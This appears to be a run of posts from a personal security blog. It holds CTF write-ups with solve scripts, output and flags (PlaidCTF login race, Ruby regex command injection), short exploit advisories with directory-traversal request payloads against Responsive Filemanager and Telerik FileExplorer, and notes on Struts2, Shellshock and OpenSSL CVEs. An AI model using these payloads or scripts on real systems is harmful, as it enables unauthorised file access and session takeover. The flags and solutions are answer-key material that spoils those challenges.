<pre style="background: #f0f0f0; border: 1px dashed #cccccc; color: black; font-family: "arial"; font-size: 12px; height: auto; line-height: 20px; overflow: auto; padding: 0px; text-align: left; width: 99%;"><code style="color: black; word-wrap: normal;">1: import requests
2:
3: def request_post(url, cookies, data):
4: r = requests.post(url, cookies=cookies, data=data)
5: if r.url == "http://triggered.pwni.ng:52856/search":
6: if "Hey there, admin" in r.text:
7: print r.text
8: print "[-] Result: Found out!"
9: exit()
10: return r
11:
12: def signin():
13: #signin
14: data = {'username':'searchtheflag'}
15: url = "http://triggered.pwni.ng:52856/login"
16: request_post(url, cookies, data)
17: data = {'password':'test'}
18: url = "http://triggered.pwni.ng:52856/login/password"
19: request_post(url, cookies, data)
20: print "[-] Sign-in: Okay"
21:
22: if __name__ == "__main__":
23: cookies = {
24: 'session': "5f129555-dafb-4feb-b1c6-472d260a8d3b"
25: }
26: signin()
27: while True:
28: #searchflag
29: data = {'query':'flag'}
30: url = "http://triggered.pwni.ng:52856/search"
31: r = request_post(url, cookies, data)
32: print "[-] Search: in progress"
33: if (r.url == "http://triggered.pwni.ng:52856/login"):
34: signin()
35:
</code></pre>
<br />
Second Code:<br />
<pre style="background: #f0f0f0; border: 1px dashed #cccccc; color: black; font-family: "arial"; font-size: 12px; height: auto; line-height: 20px; overflow: auto; padding: 0px; text-align: left; width: 99%;"><code style="color: black; word-wrap: normal;">1: import requests, time
2:
3: def request_post(url, cookies, data):
4: r = requests.post(url, cookies=cookies, data=data)
5: return r
6:
7: def signin_admin(cookies):
8: data = {'username':'admin'}
9: url = 'http://triggered.pwni.ng:52856/login'
10: request_post(url, cookies, data)
11:
12: if __name__ == "__main__":
13: cookies = {
14: 'session': "5f129555-dafb-4feb-b1c6-472d260a8d3b" #your session
15: }
16: while True:
17: signin_admin(cookies)
18: </code></pre>
<br />
Result & Flag:<br />
<br />
<u> </u>
<br />
<pre style="background: #f0f0f0; border: 1px dashed #cccccc; color: black; font-family: "arial"; font-size: 12px; height: auto; line-height: 20px; overflow: auto; padding: 0px; text-align: left; width: 99%;"><code style="color: black; word-wrap: normal;">1: [-] Sign-in: Okay
2: [-] Search: in progress
3: [-] Search: in progress
4: [-] Search: in progress
5: [-] Search: in progress
6: [-] Search: in progress
7: [-] Search: in progress
8: [-] Search: in progress
9: [-] Search: in progress
10: [-] Search: in progress
11: [-] Search: in progress
12: [-] Search: in progress
13: [-] Sign-in: Okay
14: [-] Search: in progress
15: [-] Sign-in: Okay
16: [-] Search: in progress
17: [-] Sign-in: Okay
18: [-] Search: in progress
19: [-] Sign-in: Okay
20: [-] Search: in progress
21: [-] Sign-in: Okay
22: [-] Search: in progress
23: [-] Sign-in: Okay
24: [-] Search: in progress
25: [-] Sign-in: Okay
26: [-] Search: in progress
27: [-] Sign-in: Okay
28: [-] Search: in progress
29: [-] Sign-in: Okay
30: [-] Search: in progress
31: [-] Sign-in: Okay
32: [-] Search: in progress
33: [-] Sign-in: Okay
34: [-] Search: in progress
35: [-] Sign-in: Okay
36: [-] Search: in progress
37: [-] Sign-in: Okay
38: [-] Search: in progress
39: [-] Sign-in: Okay
40: [-] Search: in progress
41: [-] Sign-in: Okay
42: [-] Search: in progress
43: [-] Sign-in: Okay
44: [-] Search: in progress
45: [-] Sign-in: Okay
46: [-] Search: in progress
47: [-] Sign-in: Okay
48: [-] Search: in progress
49: [-] Sign-in: Okay
50: [-] Search: in progress
51: [-] Sign-in: Okay
52: [-] Search: in progress
53: [-] Sign-in: Okay
54: <html>
55: <head>
56: <link rel="stylesheet" href="/static/styles.css" />
57: <link href="https://fonts.googleapis.com/css?family=Playfair+Display:400,400i,700,700i,900,900i" rel="stylesheet">
58: </head>
59: <body>
60: <header>
61: <a href="/" class="left">
62: <h1>pgNotes</h1>
63: <h2>Let's keep it PG, ok?</h2>
64: </a>
65: <div class="right">
66:
67: <nav>
68: <div class="welcome">Hey there, admin</div>
69: &middot;
70: <a href="/search">Search notes</a>
71: &middot;
72: <a href="/note/new">New note</a>
73: &middot;
74: <a href="/logout">Logout</a>
75: </nav>
76:
77: </div>
78: </header>
79: <main>
80: <section class="search-input">
81: <h3>Search</h3>
82: <form method="POST" action="/search">
83: <div class="input">
84: <label>Query</label>
85: <input type="text" name="query" />
86: </div>
87: <div class="input submit">
88: <input type="submit" />
89: </div>
90: </form>
91: </section>
92:
93: <section class="search-query">
94: Results for <span class="query">flag</span>
95: </section>
96:
97:
98: <section class="note">
99: <section class="header">
100: <h4>Flag</h4>
101: <div class="author">admin</div>
102: <div class="date">02:44pm on April 13, 2019</div>
103: </section>
104: <section class="content">
105: <p>
106: PCTF{i_rAt3_p0sTgRE5_1O_oUT_0f_14_pH_n3ed5_m0Re_4Cid}
107: </p>
108: </section>
109: </section>
110:
111: <section class="note">
112: <section class="header">
113: <h4>flag</h4>
114: <div class="author">admin</div>
115: <div class="date">08:11am on April 14, 2019</div>
116: </section>
117: <section class="content">
118: <p>
119: PCTF{cr4zy_70_m4k3_w3b_4ppl1c4710n_w17h_plp65ql}
120: </p>
121: </section>
122: </section>
123:
124: <section class="note">
125: <section class="header">
126: <h4>flag</h4>
127: <div class="author">admin</div>
128: <div class="date">04:51pm on April 14, 2019</div>
129: </section>
130: <section class="content">
131: <p>
132: PCTF{PsQl_w3bs3rv3rf0rh1pst3r_l0l}
133: </p>
134: </section>
135: </section>
136:
137: <section class="note">
138: <section class="header">
139: <h4>Flag</h4>
140: <div class="author">admin</div>
141: <div class="date">06:55pm on April 14, 2019</div>
142: </section>
143: <section class="content">
144: <p>
145: PCTF{pGn0Te2_Lets_k22P_1t_PG_oK}
146: </p>
147: </section>
148: </section>
149:
150:
151:
152: </main>
153: </body>
154: </html>
155: [-] Result: Found out!
</code></pre>
<br />
Thanks
<a href="https://twitter.com/gP4yload" target="_blank">@gP4yload</a>Kerzhttp://www.blogger.com/profile/12464121047829340760noreply@blogger.com0tag:blogger.com,1999:blog-4385614092107866208.post-26712567196129400742017-03-07T17:14:00.001+08:002017-03-07T17:14:39.510+08:00Apache Struts2 (cve-2017-5638)<span style="font-family: Verdana, sans-serif;">Becareful new Vulnerability Apach Struts2 (Cve-2017-5638).</span><br />
<br />
<span style="font-family: Verdana, sans-serif;">How to Fix: upgrade to Struts 2.3.32 or Struts 2.5.10.1<br />Affected Version: Struts 2.3.5 - 2.3.31, Struts 2.5 - 2.5.10</span><br />
<br />
<span style="font-family: Verdana, sans-serif;">POC: </span><br />
<span style="font-family: Verdana, sans-serif;"><a href="https://github.com/tengzhangchao/Struts2_045-Poc">https://github.com/tengzhangchao/Struts2_045-Poc</a> </span>Kerzhttp://www.blogger.com/profile/12464121047829340760noreply@blogger.com0tag:blogger.com,1999:blog-4385614092107866208.post-5188436628377656882016-06-09T16:49:00.004+08:002016-06-09T16:52:21.223+08:00RESPONSIVE filemanager <= 9.10.2 - Directory Traversal<span style="font-size: small;">RESPONSIVE filemanager <= 9.10.2 - Directory Traversal<br /><br />Advisory: Directory Traversal in RESPONSIVE filemanager on Window Server<br /><br />During a penetration test discovered a directory traversal vulnerability<br />in RESPONSIVE filemanager. Attackers are able to read arbitrary directory by specifying a<br />relative path.<br /><br />Details<br />=======<br /><br />Product: DRESPONSIVE filemanager<br />Affected Versions: RESPONSIVE filemanager v9.10.2<br />Fixed Versions: Not yet<br />Vulnerability Type: Directory Traversal<br />Vendor URL:<br /> http://www.responsivefilemanager.com/<br />Software Link:<br /> https://github.com/trippo/ResponsiveFilemanager/releases/download/v9.10.2/responsive_filemanager.zip<br />Vendor Status: fixed version released<br />Advisory URL: http://hacktizen.blogspot.com/2016/06/responsive-filemanager-9102-directory.html<br />Tested on: WINDOW SERVER<br />CVE: CVE-2014-2575<br />CVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-2575<br /><br />Attack Detail<br />[URL]/filemanager/dialog.php?editor=tinymce&type=&lang=&popup=0&field_id=&relative_url=0&akey=key&fldr=..\<br />fldr=..\..\..\</span>Kerzhttp://www.blogger.com/profile/12464121047829340760noreply@blogger.com0tag:blogger.com,1999:blog-4385614092107866208.post-91799484246508000642016-03-14T08:51:00.001+08:002016-03-14T08:51:05.746+08:00CODEGATE 2016: JS_is_not_a_jail<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj3mhLEjKyhD8puh_YbFr0CyQbw2MO4WIDulYXBSEsCQoyio25GtlRhhgv9_D401Z_2ZVcfFsRBALl1eLEIAdc1lb9xq9u6pg0-0JbJvO8oxQRxARDvGfB4V7T1Bg0DwIEBXKN15BX9RNI/s1600/Image.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj3mhLEjKyhD8puh_YbFr0CyQbw2MO4WIDulYXBSEsCQoyio25GtlRhhgv9_D401Z_2ZVcfFsRBALl1eLEIAdc1lb9xq9u6pg0-0JbJvO8oxQRxARDvGfB4V7T1Bg0DwIEBXKN15BX9RNI/s1600/Image.png" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<span style="text-align: start;">JS_is_not_a_jail</span><br style="text-align: start;" /><span style="text-align: start;">nc 175.119.158.131 1129</span></div>
<br />
After connect the server, I try to "quit()" command.<br />
It was occurred a error with the file path "/home/codegate/cg.js"<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhRxKfGeb_k59aVMb-TR9W2df1nQhWiYep-AWWunF-npW6F4l5UOy4X_Yw4KB0YeNeAs8Ri81vRIG2gTFUGdP9jugHXFpVHBg_wria9lmwcMQOEUNTeCIU9uJz9N3dM0mljCeN553nZJu8/s1600/Image2.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhRxKfGeb_k59aVMb-TR9W2df1nQhWiYep-AWWunF-npW6F4l5UOy4X_Yw4KB0YeNeAs8Ri81vRIG2gTFUGdP9jugHXFpVHBg_wria9lmwcMQOEUNTeCIU9uJz9N3dM0mljCeN553nZJu8/s1600/Image2.png" /></a></div>
<br />
I can use a read() feature to read the code.<br />
<br />
read('/home/codegate/cg.js')<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj8CP9rTrZUDxAkeWAbkVMm1MyBoHRpb9eEB1QAqUVomvPnx_ZZ7YDhf4gwcNd-nvn87da25rU8KJHcrh3Hil30SE0aDIPeFuPVh6E1t_1Rk040i9ZU0UJOtVrJMkkB_KGV3iMCdJqjYZM/s1600/Image3.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj8CP9rTrZUDxAkeWAbkVMm1MyBoHRpb9eEB1QAqUVomvPnx_ZZ7YDhf4gwcNd-nvn87da25rU8KJHcrh3Hil30SE0aDIPeFuPVh6E1t_1Rk040i9ZU0UJOtVrJMkkB_KGV3iMCdJqjYZM/s1600/Image3.png" /></a></div>
<br />
FLAG:<br />
easy xD, get a more hardest challenge!<br />
<div>
<br /></div>
<br />Kerzhttp://www.blogger.com/profile/12464121047829340760noreply@blogger.com5tag:blogger.com,1999:blog-4385614092107866208.post-65785550056788301072016-02-22T09:43:00.000+08:002016-02-22T09:44:55.860+08:00Internetwache 2016 EXP50 Writeup<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjZ01li-cjsYkkSDkKNOuMrCO-L6HLtmqrCMWqN9jJ64TmkS4lBpvPJjHehwCVjEmNs21NIOGOgGHzUdeeLzLQuJujm1fZd7xz3pG3dYjhOEEefS8r78JiPvNiSfnbBa1wq6ZkthznqT1c/s1600/exp50_1.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="305" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjZ01li-cjsYkkSDkKNOuMrCO-L6HLtmqrCMWqN9jJ64TmkS4lBpvPJjHehwCVjEmNs21NIOGOgGHzUdeeLzLQuJujm1fZd7xz3pG3dYjhOEEefS8r78JiPvNiSfnbBa1wq6ZkthznqT1c/s640/exp50_1.jpg" width="640" /></a></div>
<br />
<br />
When I access the server ;188.166.133.53:12037.<br />
It shows <span style="color: blue;">"Let me count the ascii values of 10 characters:"</span>.<br />
I just input some text such as <span style="color: blue;">"test"</span>, Then it shows an error as below:<br />
<span style="color: blue;">"WRONG!!!! Only 10 characters matching /^[a-f]{10}$/ !"</span><br />
<br />
The Ruby has a vulnerability of regex. I code to get a Flag.<br />
<br />
<pre style="background: #f0f0f0; border: 1px dashed #cccccc; color: black; font-family: "arial"; font-size: 12px; height: auto; line-height: 20px; overflow: auto; padding: 0px; text-align: left; width: 99%;"><code style="color: black; word-wrap: normal;"> import socket
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(('188.166.133.53', 12037))
print s.recv(1024)
print s.recv(1024)
s.send('ls\naaaaaaaaaa')
print s.recv(1024)
s.close()
</code></pre>
<br />
Then, the server returns as below:<br />
<br />
<span style="color: blue;">$ python test.py</span><br />
<span style="color: blue;">Let me count the ascii values of 10 characters:</span><br />
<span style="color: blue;"><br /></span>
<span style="color: blue;"><br /></span>
<span style="color: blue;">Sum is: 1203</span><br />
<span style="color: blue;">IW{RUBY_R3G3X_F41L}</span><br />
<div>
<br /></div>
<br />
FLAG:<br />
<span style="color: blue;">IW{RUBY_R3G3X_F41L}</span><br />
<br />
Reference:<br />
http://sakurity.com/blog/2015/06/04/mongo_ruby_regexp.htmlKerzhttp://www.blogger.com/profile/12464121047829340760noreply@blogger.com0tag:blogger.com,1999:blog-4385614092107866208.post-83663797357401666852016-01-13T09:05:00.000+08:002016-01-13T09:07:12.371+08:00List of all the security conference in 2015 (or older)Reference: <a href="https://www.reddit.com/r/netsec/comments/40i06f/i_put_together_a_list_of_all_the_security/">https://www.reddit.com/r/netsec/comments/40i06f/i_put_together_a_list_of_all_the_security/</a><br />
<br />
1. Security Conferences from 2015<br />
<a href="https://www.tunnelsup.com/online-security-conferences/">https://www.tunnelsup.com/online-security-conferences/</a><br />
<br />
2. NorthSec, Montreal, Canada<br />
<a href="https://www.youtube.com/playlist?list=PLuUtcRxSUZUpQAa54H6PKkfX6A48ruzhh">https://www.youtube.com/playlist?list=PLuUtcRxSUZUpQAa54H6PKkfX6A48ruzhh</a><br />
<br />
3. 32C3<br />
<a href="https://www.youtube.com/playlist?list=PL_IxoDz1Nq2YahR4DU9q5GWsSTle-mETW">https://www.youtube.com/playlist?list=PL_IxoDz1Nq2YahR4DU9q5GWsSTle-mETW</a><br />
<br />
4. PS4 Booting and running Linux<br />
<a href="https://www.youtube.com/watch?v=PQFNnr6Ly9M">https://www.youtube.com/watch?v=PQFNnr6Ly9M</a><br />
<br />
5. Metcalf - Modern Active Directory Attacks (Blackhat usa 2015)<br />
<a href="https://www.youtube.com/watch?v=b6GUXerE9Ac&list=PLH15HpR5qRsXF78lrpWP2JKpPJs_AFnD7&index=42">https://www.youtube.com/watch?v=b6GUXerE9Ac&list=PLH15HpR5qRsXF78lrpWP2JKpPJs_AFnD7&index=42</a><br />
<br />
6. Rob Fuller - Basic Security<br />
<a href="ttps://www.youtube.com/watch?v=TqbGNFfl1d8">ttps://www.youtube.com/watch?v=TqbGNFfl1d8</a><br />
<br />
7. SteelCon (Sheffield, UK, July 3-5 2015)<br />
<a href="https://www.youtube.com/playlist?list=PLmfJypsykTLX9mDeChQ7fovybwYzQgr6j">https://www.youtube.com/playlist?list=PLmfJypsykTLX9mDeChQ7fovybwYzQgr6j</a><br />
<br />
8. ekoparty 2015<br />
<a href="ttps://vimeo.com/album/3682874">ttps://vimeo.com/album/3682874</a><br />
<br />
9. OWASP AppSec EU and CA<br />
<a href="https://www.youtube.com/playlist?list=PLpr-xdpM8wG93dG_L9QKs0W1cD-esQEzU">https://www.youtube.com/playlist?list=PLpr-xdpM8wG93dG_L9QKs0W1cD-esQEzU</a><br />
<br />
10. Crypto 2015<br />
<a href="https://m.youtube.com/playlist?list=PLeeS-3Ml-rpoNWewUnljPP7QN4USn4c7H">https://m.youtube.com/playlist?list=PLeeS-3Ml-rpoNWewUnljPP7QN4USn4c7H</a><br />
<a href="http://www.iacr.org/conferences/crypto2015/">http://www.iacr.org/conferences/crypto2015/</a><br />
<br />
11. BSides Orlando (- April 11 – 12, 2015 -)<br />
<a href="https://www.youtube.com/playlist?list=PLu1bAtIWt2VbXiy4kNWdtVkWiRWvPoeD6">https://www.youtube.com/playlist?list=PLu1bAtIWt2VbXiy4kNWdtVkWiRWvPoeD6</a><br />
<br />
12. BruCON as well (26-27 October)<br />
<a href="https://www.youtube.com/user/brucontalks">https://www.youtube.com/user/brucontalks</a><br />
<br />
13. USENIX Security '15<br />
<a href="https://www.youtube.com/playlist?list=PLbRoZ5Rrl5lfeRixThHzgGYj1wu80JOh3">https://www.youtube.com/playlist?list=PLbRoZ5Rrl5lfeRixThHzgGYj1wu80JOh3</a><br />
<br />
14. Brucon (Belgium)<br />
<a href="https://www.youtube.com/playlist?list=PLtb1FJdVWjUfZ9fWxPPCrOO7LUquB3WrB">https://www.youtube.com/playlist?list=PLtb1FJdVWjUfZ9fWxPPCrOO7LUquB3WrB</a><br />
<br />
15. CERT.pl's Secure 2015<br />
<a href="https://www.youtube.com/playlist?list=PLghf5UNZbzG0zLarfwpw4PxPTS0IWo8vB">https://www.youtube.com/playlist?list=PLghf5UNZbzG0zLarfwpw4PxPTS0IWo8vB</a><br />
<br />
16. CornCon<br />
<a href="https://www.youtube.com/channel/UCP2fm3Wg8LacmD96N7CkOBA/videos?sort=dd&view=0&shelf_id=0">https://www.youtube.com/channel/UCP2fm3Wg8LacmD96N7CkOBA/videos?sort=dd&view=0&shelf_id=0</a><br />
<br />
17. BSides Charleston<br />
<a href="https://www.youtube.com/user/bsideschs/videos">https://www.youtube.com/user/bsideschs/videos</a><br />
<br />
18. SaintCON 2015 at Weber State University in Ogden UT<br />
<a href="https://www.youtube.com/channel/UCEiHGeWgdIoLCzTLm_izCoQ">https://www.youtube.com/channel/UCEiHGeWgdIoLCzTLm_izCoQ</a><br />
<br />
19. BSidesSLC that will be in Salt Lake City 2016<br />
<a href="https://www.youtube.com/channel/UCuJ0qrx-oNq2hxrUX5IYd9A">https://www.youtube.com/channel/UCuJ0qrx-oNq2hxrUX5IYd9A</a><br />
<br />
20. syscan<br />
<a href="https://www.youtube.com/channel/UCx5hZiie0VzFvV-u376v7DQ">https://www.youtube.com/channel/UCx5hZiie0VzFvV-u376v7DQ</a><br />
<br />
21. Brocon 2015<br />
<a href="https://www.youtube.com/playlist?list=PL2EYTX8UVCMhwxWH1IklKkV64YX_0Xcoo">https://www.youtube.com/playlist?list=PL2EYTX8UVCMhwxWH1IklKkV64YX_0Xcoo</a><br />
<br />
22. CarolinaCon<br />
<a href="https://www.youtube.com/user/CarolinaConVideos/videos">https://www.youtube.com/user/CarolinaConVideos/videos</a><br />
<br />
23. Bsides Lisbon 2015<br />
<a href="https://www.youtube.com/channel/UC_M0dk4dvcBr_rFgi710D4Q">https://www.youtube.com/channel/UC_M0dk4dvcBr_rFgi710D4Q</a>Kerzhttp://www.blogger.com/profile/12464121047829340760noreply@blogger.com0tag:blogger.com,1999:blog-4385614092107866208.post-8570411265555992812015-08-26T11:13:00.003+08:002015-08-27T10:05:45.337+08:00Python EML file viewer (simple version)<span style="font-family: Verdana, sans-serif;">Sometimes, employees passes eml file to me for a reference or etc.</span><br />
<span style="font-family: Verdana, sans-serif;">Unfortunately, I don't have an eml viewer....</span><br />
<span style="font-family: Verdana, sans-serif;"><br /></span>
<span style="font-family: Verdana, sans-serif;">So I just coded simply convert from eml file to html for only plain/text and that is in the base64.</span><br />
<span style="font-family: Verdana, sans-serif;">When I searched python module for an eml converter, I am able to find out the "email" module.</span><br />
<span style="font-family: Verdana, sans-serif;">But I need only simple version. :)</span><br />
<span style="font-family: Verdana, sans-serif;"><br /></span>
<span style="font-family: Verdana, sans-serif;">I hope it is helping your working. :)</span><br />
<br />
<br />
<style type="text/css">
pre.CICodeFormatter{
font-family:arial;
font-size:12px;
border:1px dashed #CCCCCC;
width:99%;
height:auto;
overflow:auto;
background:#f0f0f0;
line-height:20px;
background-image:URL(https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgbGAmpafepB_DYzTQ5uKoSq4CmLz5gTkUy3R58FZtJHqQiyM6jvzioFgnKhR8MPzasfOG_ap38nhZdd0Tn9gunmW5SLM25-Fgr749DjG-nWmFDfGXl0ETE94dXaPRMOcvPVbxOYAJeB656/s320/codebg.gif);
padding:0px;
color:#000000;
text-align:left;
}
pre.CICodeFormatter code{
color:#000000;
word-wrap:normal;
}
</style>
<br />
<pre class="CICodeFormatter"><code class="CICodeFormatter"> import re, base64
filename = "./1.eml"
num_lines = sum(1 for line in open(filename))
S = ""
with open(filename, "r") as f:
for i in range(0, num_lines-1):
if (re.findall("Content-Type: ", f.readline())):
i = i + 2
f.readline()
#print (f.readline())
if(re.findall("Content-Transfer-Encoding: base64", f.readline())):
f.readline()
while(1):
tmp = f.readline()+f.readline()
if (re.findall("\n\n", tmp)):
break
S = S+tmp
with open(filename+"_convert.html", "w") as con_f:
con_f.write("<b>CONVERT: ONLY PLAIN/TEXT</b><br /><br />\n")
con_f.write(base64.b64decode(S))
</code></pre>
Kerzhttp://www.blogger.com/profile/12464121047829340760noreply@blogger.com0tag:blogger.com,1999:blog-4385614092107866208.post-81141762348715539282015-05-18T10:41:00.003+08:002015-05-18T10:41:22.599+08:00DEFCON 23 CTF Write up (Links)<div style="border: 0px; color: #383838; font-family: gotham, helvetica, arial, sans-serif; font-size: 14px; line-height: 1.571428em; margin: 0px; padding: 0px;">
<h3 style="border: 0px; font-size: 1em; line-height: 1.571428em; margin: 1.4285em 0px 0.714285em; padding: 0px;">
Defcon 23 Quals Writeup</h3>
</div>
<div style="border: 0px; color: #383838; font-family: gotham, helvetica, arial, sans-serif; font-size: 14px; line-height: 1.571428em; margin: 0px; padding: 0px;">
<a data-mce-href="http://d.hatena.ne.jp/Kango/20150518/1431907470" href="http://d.hatena.ne.jp/Kango/20150518/1431907470" shape="rect" style="border: 0px; color: #047ac6; cursor: pointer; line-height: 1.571428em; margin: 0px; padding: 0px;" target="_blank">http://d.hatena.ne.jp/Kango/20150518/1431907470</a></div>
<div style="border: 0px; color: #383838; font-family: gotham, helvetica, arial, sans-serif; font-size: 14px; line-height: 1.571428em; margin: 0px; padding: 0px;">
<a data-mce-href="http://lockboxx.blogspot.com/" href="http://lockboxx.blogspot.com/" shape="rect" style="border: 0px; color: #047ac6; cursor: pointer; line-height: 1.571428em; margin: 0px; padding: 0px;" target="_blank">http://lockboxx.blogspot.com/</a></div>
Kerzhttp://www.blogger.com/profile/12464121047829340760noreply@blogger.com0tag:blogger.com,1999:blog-4385614092107866208.post-85040295988872975662014-11-12T18:06:00.000+08:002020-01-07T02:07:06.845+08:00Telerik File Explorer Directory Traversal# Exploit Title: Telerik FileExplorer Directory Traversal<br />
# Date: 12/11/2014<br />
# Exploit Author: Kerz<br />
# Vendor Homepage: www.telerik.com<br />
# Software Link: http://www.telerik.com/products/aspnet-ajax.aspx<br />
# Version: Q3 2014<br />
# Tested on: Windows OS<br />
# CVE: None<br />
<br />
The malicuious user sends a malformed request that generates the file access up directories as follows:<br />
<br />
http://target_URL/FileExplorer.aspx<br />
[POST Data]<br />
&__CALLBACKPARAM -> "path":"../../"<br />
<br />
ThanksKerzhttp://www.blogger.com/profile/12464121047829340760noreply@blogger.com0tag:blogger.com,1999:blog-4385614092107866208.post-89262307029696063682014-10-30T17:45:00.000+08:002014-10-30T17:45:49.048+08:00Penetration test sample reportIt looks nice a pentest sample report.<br />
<br />
<a href="http://www.offensive-security.com/penetration-testing-sample-report.pdf">http://www.offensive-security.com/penetration-testing-sample-report.pdf</a><br />
<br />
<br />Kerzhttp://www.blogger.com/profile/12464121047829340760noreply@blogger.com0tag:blogger.com,1999:blog-4385614092107866208.post-6832068550880720642014-10-23T15:41:00.003+08:002014-10-23T15:53:01.332+08:00Shellshock<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><b><span style="font-size: large;">Shellshock</span></b>, also known as Bashdoor, is a family of security bugs in the widely used Unix Bash shell, the first of which was disclosed on 24 September 2014. Many Internet-facing services, such as some web server deployments, use Bash to process certain requests, allowing an attacker to cause vulnerable versions of Bash to execute arbitrary commands. This can allow an attacker to gain unauthorized access to a computer system.</span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;">Point of the vulnerability: '</span><span style="font-family: Arial, Helvetica, sans-serif;"><b>:() { :; };</b>'</span><br />
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span>
<span style="font-family: Arial, Helvetica, sans-serif;">How to fix</span><br />
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span>
<span style="font-family: Arial, Helvetica, sans-serif;"><b>CentOS, Ubuntu, Linux systems</b></span><br />
<span style="font-family: Arial, Helvetica, sans-serif;"><b><br /></b></span>
<span style="font-family: Arial, Helvetica, sans-serif;"><b>[yum]</b></span><br />
<span style="font-family: Arial, Helvetica, sans-serif;">yum update bash -y</span><br />
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span>
<b style="font-family: Arial, Helvetica, sans-serif;">[apt-get]</b><br />
<span style="font-family: Arial, Helvetica, sans-serif;">apt-get update; apt-get install --only-upgrade bash</span><br />
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span>
<b style="font-family: Arial, Helvetica, sans-serif;">[pacman]</b><br />
<span style="font-family: Arial, Helvetica, sans-serif;">pacman -Syu</span><br />
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span>
<span style="font-family: Arial, Helvetica, sans-serif;"><b>OS X</b></span><br />
<span style="font-family: Arial, Helvetica, sans-serif;"><b><br /></b></span>
<span style="font-family: Arial, Helvetica, sans-serif;"><b>[Brew]</b></span><br />
<span style="font-family: Arial, Helvetica, sans-serif;">brew update</span><br />
<span style="font-family: Arial, Helvetica, sans-serif;">brew install bash</span><br />
<span style="font-family: Arial, Helvetica, sans-serif;">sudo sh -c 'echo "/usr/local/bin/bash" >> /etc/shells'</span><br />
<span style="font-family: Arial, Helvetica, sans-serif;">chsh -s /usr/local/bin/bash</span><br />
<span style="font-family: Arial, Helvetica, sans-serif;">sudo mv /bin/bash /bin/bash-backup</span><br />
<span style="font-family: Arial, Helvetica, sans-serif;">sudo ln -s /usr/local/bin/bash /bin/bash</span><br />
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span>
<span style="font-family: Arial, Helvetica, sans-serif;"><b>[MacPorts]</b></span><br />
<span style="font-family: Arial, Helvetica, sans-serif;">sudo port selfupdate</span><br />
<span style="font-family: Arial, Helvetica, sans-serif;">sudo port upgrade bash</span><br />
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br />Reference: <br />[gry/shellshock-scanner]<br />https://github.com/gry/shellshock-scanner<br />https://github.com/gry/shellshock-scanner/blob/master/shellshock_scanner.py</span><br />
<span style="font-family: Arial, Helvetica, sans-serif;">https://shellshocker.net/</span>Kerzhttp://www.blogger.com/profile/12464121047829340760noreply@blogger.com0tag:blogger.com,1999:blog-4385614092107866208.post-1504218258022280552014-06-13T13:32:00.002+08:002014-06-13T16:28:55.578+08:00OpenSSL CCS Inject - TEST<span style="font-family: inherit;">A OpenSSL has many vulnerabilities currently.</span><br />
<b style="white-space: pre-wrap;"><span style="font-family: inherit;"><br /></span></b>
<b style="white-space: pre-wrap;"><span style="font-family: inherit;">Vulnerabilities:</span></b><br />
<span style="font-family: inherit;"><i><br /></i>
<i>CVE-2014-0224 (MitM)</i></span><br />
<span style="background-color: white; font-family: inherit;">OpenSSL before 0.9.8za, 1.0.0 before 1.0.0m, and 1.0.1 before 1.0.1h does not properly restrict processing of ChangeCipherSpec messages, which allows man-in-the-middle attackers to trigger use of a zero-length master key in certain OpenSSL-to-OpenSSL communications, and consequently hijack sessions or obtain sensitive information, via a crafted TLS handshake, aka the "CCS Injection" vulnerability.</span><br />
<span style="font-family: inherit;"><br />
<i>CVE-2014-0221 (DoS)</i></span><br />
<span style="background-color: white; font-family: inherit;">The dtls1_get_message_fragment function in d1_both.c in OpenSSL before 0.9.8za, 1.0.0 before 1.0.0m, and 1.0.1 before 1.0.1h allows remote attackers to cause a denial of service (recursion and client crash) via a DTLS hello message in an invalid DTLS handshake.</span><br />
<span style="font-family: inherit;"><br />
<i>CVE-2014-0195 (Remote Execute Code)</i></span><br />
<span style="background-color: white; font-family: inherit;">The dtls1_reassemble_fragment function in d1_both.c in OpenSSL before 0.9.8za, 1.0.0 before 1.0.0m, and 1.0.1 before 1.0.1h does not properly validate fragment lengths in DTLS ClientHello messages, which allows remote attackers to execute arbitrary code or cause a denial of service (buffer overflow and application crash) via a long non-initial fragment.</span><br />
<i style="font-family: inherit; white-space: pre-wrap;"><br /></i>
<i style="font-family: inherit; white-space: pre-wrap;">CVE-2014-0198 (Remote Execute Code)</i><br />
<span style="background-color: white; font-family: inherit;">The do_ssl3_write function in s3_pkt.c in OpenSSL 1.x through 1.0.1g, when SSL_MODE_RELEASE_BUFFERS is enabled, does not properly manage a buffer pointer during certain recursive calls, which allows remote attackers to cause a denial of service (NULL pointer dereference and application crash) via vectors that trigger an alert condition.</span><br />
